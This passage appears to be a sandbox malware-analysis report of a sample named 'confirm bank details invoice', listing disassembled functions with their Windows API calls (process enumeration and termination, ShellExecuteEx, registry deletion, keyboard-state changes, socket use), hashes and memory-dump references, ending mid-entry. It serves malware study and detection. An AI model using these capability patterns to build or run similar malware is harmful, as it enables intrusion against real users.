                    Function 004C16DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                      • Part of subcall function 0048C6F4: _wcscpy.LIBCMT ref: 0048C717
                    • _wcstok.LIBCMT ref: 004C184E
                    • _wcscpy.LIBCMT ref: 004C18DD
                    • _memset.LIBCMT ref: 004C1910
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X$p2Rl2R
                    • API String ID: 774024439-1074552182
                    • Opcode ID: 5390de07f648790f37082b8f7ca679914af87a2da17bb688bdf2f0714b8d1c93
                    • Instruction ID: da780f213becf2f9a32c12ce2fdb5d39fec093552b192690f1056cdc4f22e938
                    • Opcode Fuzzy Hash: 5390de07f648790f37082b8f7ca679914af87a2da17bb688bdf2f0714b8d1c93
                    • Instruction Fuzzy Hash: FFC180745043409FC754EF25C981E9AB7E0FF86354F00896EF889972A2DB74ED05CB9A
                    Function 004786C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _memset
                    • String ID: Q\E$[$\$\$]$^
                    • API String ID: 2102423945-1026548749
                    • Opcode ID: c6636c80a54828720bee8154ee5baf21862e2dc11b3134284aff9535f0650c4f
                    • Instruction ID: 5166be26cc56ec1960a0cd4b8fed56effb37ebbffc47cf013747f8f864105720
                    • Opcode Fuzzy Hash: c6636c80a54828720bee8154ee5baf21862e2dc11b3134284aff9535f0650c4f
                    • Instruction Fuzzy Hash: 8C518E71D002599BCF24CF99C8856EEB7B2BF94314F24C16BD818A7351E7389D85CB89
                    Function 004D9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004D9B19
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 004D9B2D
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004D9B47
                    • _wcscat.LIBCMT ref: 004D9BA2
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 004D9BB9
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004D9BE7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 448aadb7d88dbe688f5a8f1c8845ee0054aca037bb4edfc5ffe4d0a1a29ae190
                    • Instruction ID: 5db26ea300440ade557902d262d7065f2b653c2b57be454468c445eda2b80f7c
                    • Opcode Fuzzy Hash: 448aadb7d88dbe688f5a8f1c8845ee0054aca037bb4edfc5ffe4d0a1a29ae190
                    • Instruction Fuzzy Hash: 0641C271A00308ABEB219FA4CC85BEE7BA8EF08354F10042BF549E7391C7759D84CB68
                    Function 004D172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004B6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004B6554
                      • Part of subcall function 004B6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004B6564
                      • Part of subcall function 004B6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004B65F9
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D179A
                    • GetLastError.KERNEL32 ref: 004D17AD
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D17D9
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004D1855
                    • GetLastError.KERNEL32(00000000), ref: 004D1860
                    • CloseHandle.KERNEL32(00000000), ref: 004D1895
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 75c23bcdbab667dfbea86867fe37c4b3fe1e4cf42f62ec8a86eaf015c6f46f1c
                    • Instruction ID: d89f9c3a428f253fc69fd33b53fd936332ff86db91bc0fca3ab388b18527dabf
                    • Opcode Fuzzy Hash: 75c23bcdbab667dfbea86867fe37c4b3fe1e4cf42f62ec8a86eaf015c6f46f1c
                    • Instruction Fuzzy Hash: A8419D71600200AFDB15EF55C9E5FBEB7A2AF54304F04845EF9069B3D2DBB8A900DB99
                    Function 004B5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 004B58B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: c1505c90da0ffb1fe15e44b8514811e81300731632049aa4d52d6b9aa7ff671a
                    • Instruction ID: 90531a87c70cc0bdeecd9aca44a4bfa9f46e446a6ada15be0fa5e729682c7cd3
                    • Opcode Fuzzy Hash: c1505c90da0ffb1fe15e44b8514811e81300731632049aa4d52d6b9aa7ff671a
                    • Instruction Fuzzy Hash: 70112B31609742BEEB056A55AC82EEBBB9DAF15314F20003FF500E62C1E7ACAA50427D
                    Function 004BA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 004BA806
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ArraySafeVartype
                    • String ID:
                    • API String ID: 1725837607-0
                    • Opcode ID: 24c65685e82006dfccf56fc0832155a48052535cc9d0f6e164cc3cabbcde0088
                    • Instruction ID: 9ef225bcb9298f4c235e3cf017f07a052ab9193a3a1ad61807ddfbdb22b53051
                    • Opcode Fuzzy Hash: 24c65685e82006dfccf56fc0832155a48052535cc9d0f6e164cc3cabbcde0088
                    • Instruction Fuzzy Hash: 65C16B75A0421A9FDB00DF98C481BEEB7F4EF08315F24446AE605E7241D738A956CBAA
                    Function 004B6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004B6B63
                    • LoadStringW.USER32(00000000), ref: 004B6B6A
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004B6B80
                    • LoadStringW.USER32(00000000), ref: 004B6B87
                    • _wprintf.LIBCMT ref: 004B6BAD
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004B6BCB
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 004B6BA8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: 5853c35e8471feec5a3b8fa18a40eb76566ad6d43d700478eede8ee2b121d752
                    • Instruction ID: 17cf277d17af003f3a403c090c6440fb8e8f35d607aa9bf707f7accc4bfb9db1
                    • Opcode Fuzzy Hash: 5853c35e8471feec5a3b8fa18a40eb76566ad6d43d700478eede8ee2b121d752
                    • Instruction Fuzzy Hash: 3B0136F69002187FEB11A7949D89EFB777CE704304F0045A6B746D2041EA789E94CF79
                    Function 004D2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004D3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D2BF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharConnectRegistryUpper
                    • String ID:
                    • API String ID: 2595220575-0
                    • Opcode ID: afbcb351aa9405bae8d66495bd96785c3e27c27ad08b85c29c2a4f10b0cbbb6f
                    • Instruction ID: bbfc0ec1d4a5a7715cbe2bd79c0ebfc57732bcca0a2ce24cfccb78cfc4d73727
                    • Opcode Fuzzy Hash: afbcb351aa9405bae8d66495bd96785c3e27c27ad08b85c29c2a4f10b0cbbb6f
                    • Instruction Fuzzy Hash: 2D917B716042009FC710EF15C991AAEB7E6FF98318F04885FF99697391DB78E905CB4A
                    Function 004C95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                    Download Yara Rule
                    APIs
                    • select.WSOCK32 ref: 004C9691
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C969E
                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004C96C8
                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004C96E9
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C96F8
                    • htons.WSOCK32(?,?,?,00000000,?), ref: 004C97AA
                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0050DC00), ref: 004C9765
                      • Part of subcall function 004AD2FF: _strlen.LIBCMT ref: 004AD309
                    • _strlen.LIBCMT ref: 004C9800
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                    • String ID:
                    • API String ID: 3480843537-0
                    • Opcode ID: 6d68aa0981a97e96ceb40f32a65efe7c7bf5f1ad5e0540ffad3114b2b68b07cd
                    • Instruction ID: bd208373251e8285742a752e937c5187b8fa7f6fa1e7ee708cc58fc4a488bb7f
                    • Opcode Fuzzy Hash: 6d68aa0981a97e96ceb40f32a65efe7c7bf5f1ad5e0540ffad3114b2b68b07cd
                    • Instruction Fuzzy Hash: AC81E131504200ABC314EF65CC85F6BB7E9EF85718F104A2EF5559B291EB38ED05CBAA
                    Function 0049A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __mtinitlocknum.LIBCMT ref: 0049A991
                      • Part of subcall function 00497D7C: __FF_MSGBANNER.LIBCMT ref: 00497D91
                      • Part of subcall function 00497D7C: __NMSG_WRITE.LIBCMT ref: 00497D98
                      • Part of subcall function 00497D7C: __malloc_crt.LIBCMT ref: 00497DB8
                    • __lock.LIBCMT ref: 0049A9A4
                    • __lock.LIBCMT ref: 0049A9F0
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00526DE0,00000018,004A5E7B,?,00000000,00000109), ref: 0049AA0C
                    • EnterCriticalSection.KERNEL32(8000000C,00526DE0,00000018,004A5E7B,?,00000000,00000109), ref: 0049AA29
                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0049AA39
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                    • String ID:
                    • API String ID: 1422805418-0
                    • Opcode ID: ddf431707fc5df49ff02aa1a5675269646792fc11c919fe7a17e97fcc951713e
                    • Instruction ID: 217f938145fcc261a37ef06f055ce5e841d12a884892c2164f6fbdd3825fe532
                    • Opcode Fuzzy Hash: ddf431707fc5df49ff02aa1a5675269646792fc11c919fe7a17e97fcc951713e
                    • Instruction Fuzzy Hash: 9E412371A002019BEF10DF69DA44759BFA0AF05328F11823EE425AB2D1DB7C9821CBCA
                    Function 004D8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 004D8EE4
                    • GetDC.USER32(00000000), ref: 004D8EEC
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D8EF7
                    • ReleaseDC.USER32(00000000,00000000), ref: 004D8F03
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 004D8F3F
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004D8F50
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004DBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 004D8F8A
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004D8FAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 7d57a2b3fa9c97189f37cf862b1493f597546e02401292b5ef42154c88084a17
                    • Instruction ID: 1c2480021a18e74ab6030edd0e840aa04a307a2907e253ce2acc1ad4b94e1c16
                    • Opcode Fuzzy Hash: 7d57a2b3fa9c97189f37cf862b1493f597546e02401292b5ef42154c88084a17
                    • Instruction Fuzzy Hash: 6F316D72500214BFEB118F50CC49FFB3BAAEF49715F04406AFE09DA291CA799851CB78
                    Function 004E0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • GetSystemMetrics.USER32(0000000F), ref: 004E016D
                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 004E038D
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004E03AB
                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 004E03D6
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004E03FF
                    • ShowWindow.USER32(00000003,00000000), ref: 004E0421
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 004E0440
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                    • String ID:
                    • API String ID: 3356174886-0
                    • Opcode ID: 4ab762b0d3c034826cc4bdff908a3cee276702bb24d9e9739f1742dd63d8d6f8
                    • Instruction ID: fd4a6e13492830e199562ce0a3c405fdabeb3f6b801b168b313addf08c96f05d
                    • Opcode Fuzzy Hash: 4ab762b0d3c034826cc4bdff908a3cee276702bb24d9e9739f1742dd63d8d6f8
                    • Instruction Fuzzy Hash: 98A1D230600656EFDB18CF69C9857BEBBB1FF04702F048156EC64AB290D7B8AD90CB94
                    Function 0048AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ac20eadd58e4ea3a583044649e3d2fb6b1265581c0704c6398384509a6fb662
                    • Instruction ID: 8fd17f48d32af942a20aed7579dae1fb64c4acbc41a5acd8458e34e9463d4703
                    • Opcode Fuzzy Hash: 2ac20eadd58e4ea3a583044649e3d2fb6b1265581c0704c6398384509a6fb662
                    • Instruction Fuzzy Hash: FA71BE70900109EFDB04DF99CC44ABFBB75FF85314F10854AFA15A6250C7789A52CFA9
                    Function 004D2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004D225A
                    • _memset.LIBCMT ref: 004D2323
                    • ShellExecuteExW.SHELL32(?), ref: 004D2368
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                      • Part of subcall function 0048C6F4: _wcscpy.LIBCMT ref: 0048C717
                    • CloseHandle.KERNEL32(00000000), ref: 004D242F
                    • FreeLibrary.KERNEL32(00000000), ref: 004D243E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 4082843840-2766056989
                    • Opcode ID: c1918f360e2194c8d34234c2685989aaca58f1dfacadce7e26750ebe016f54a0
                    • Instruction ID: b0a7e745e27dc34923cf4cbb6884f2eb8e7cd872288688a1b1916b304a8bf50f
                    • Opcode Fuzzy Hash: c1918f360e2194c8d34234c2685989aaca58f1dfacadce7e26750ebe016f54a0
                    • Instruction Fuzzy Hash: E6716C70A006199FCF04EFA5C5919AEBBF5FF48314F10846BE859AB351CB78AD41CB98
                    Function 004B3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(00000000), ref: 004B3C02
                    • GetKeyboardState.USER32(?), ref: 004B3C17
                    • SetKeyboardState.USER32(?), ref: 004B3C78
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004B3CA4
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004B3CC1
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004B3D05
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004B3D26
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 20d136c9154be342d30fcd0fcdec1fa2e9feba26e0fa756496e6939b355c17dc
                    • Instruction ID: 0aaf34f3ad9bb197b051d3a5ed2497e541139ac0989388669898f228c2cd0a7d
                    • Opcode Fuzzy Hash: 20d136c9154be342d30fcd0fcdec1fa2e9feba26e0fa756496e6939b355c17dc
                    • Instruction Fuzzy Hash: 705136A19083D13DFB328B768C45BF7BFA95B06305F08848AE0C5565C3D298EE94D778
                    Function 004D3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 004D3DA1
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004D3DCB
                    • FreeLibrary.KERNEL32(00000000), ref: 004D3E80
                      • Part of subcall function 004D3D72: RegCloseKey.ADVAPI32(?), ref: 004D3DE8
                      • Part of subcall function 004D3D72: FreeLibrary.KERNEL32(?), ref: 004D3E3A
                      • Part of subcall function 004D3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 004D3E5D
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 004D3E25
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
